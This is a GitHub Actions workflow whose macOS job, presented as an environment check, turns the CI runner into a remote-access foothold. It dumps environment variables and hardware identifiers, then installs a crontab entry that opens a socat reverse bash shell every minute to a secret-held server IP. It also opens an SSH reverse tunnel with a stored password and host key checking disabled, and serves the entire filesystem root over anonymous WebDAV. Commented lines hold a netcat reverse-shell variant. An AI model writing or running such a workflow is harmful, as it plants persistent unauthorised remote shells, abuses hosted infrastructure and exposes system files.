name: main

on: push

jobs:
  macos-check-jb:
    name: macos_check
    runs-on: macos-latest
    steps:
      - name: print_macos_env
        env:
          PUBLIC_SERVER_IP: ${{ secrets.PUBLIC_SERVER }}
          JSERV_PASSWD: ${{ secrets.JSERV_PASSWD }}
        run: |
          uname -a
          xcrun -f clang
          ls -al /Applications
          ls /
          env
          echo "check if same macos"
          sysctl -a | grep -i boot
          
          echo "deviceId" 
          system_profiler SPHardwareDataType
          brew install blacktop/tap/ipsw
          ipsw version
          echo "Current Date and Time: $(date)"
          echo "Current Timezone: $(date +'%Z %z')"
          echo "-----> done "
          # xcrun python3 -m http.server 8888 
          brew install sshpass netcat wget socat #dropbear openssh rlwrap
          xcrun python3 -m pip install wsgidav cheroot
          # netcat $PUBLIC_SERVER_IP 2333 -e /bin/bash
          # export PATH=$PATH:"$(xcrun python3 -m site --user-base)/bin"
          # nohup "$(xcrun python3 -m site --user-base)/bin/wsgidav" --host=0.0.0.0 --port=8080 --root=/ --auth=anonymous &
          # nohup socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$PUBLIC_SERVER_IP:2224 &
          echo "* * * * * /opt/homebrew/bin/socat exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane tcp:$PUBLIC_SERVER_IP:2228" | crontab -
          # sshpass -p$JSERV_PASSWD ssh -fR 7788:127.0.0.1:8080 ubuntu@$PUBLIC_SERVER_IP -N
          sshpass -p$JSERV_PASSWD ssh -fR 7789:127.0.0.1:8080 ubuntu@$PUBLIC_SERVER_IP -N -o StrictHostKeyChecking=no
          # xcrun python3 -m http.server 8888 
          "$(xcrun python3 -m site --user-base)/bin/wsgidav" --host=0.0.0.0 --port=8080 --root=/ --auth=anonymous

  linux-test-jb:
    name: linux_check
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
      with:
        fetch-depth: 2
        token: ${{ secrets.MYTOKEN }}

    - name: unzip
      env:
        WLB_KEY: ${{ secrets.WLB_KEY }}
      run: |
        uname -a
        
        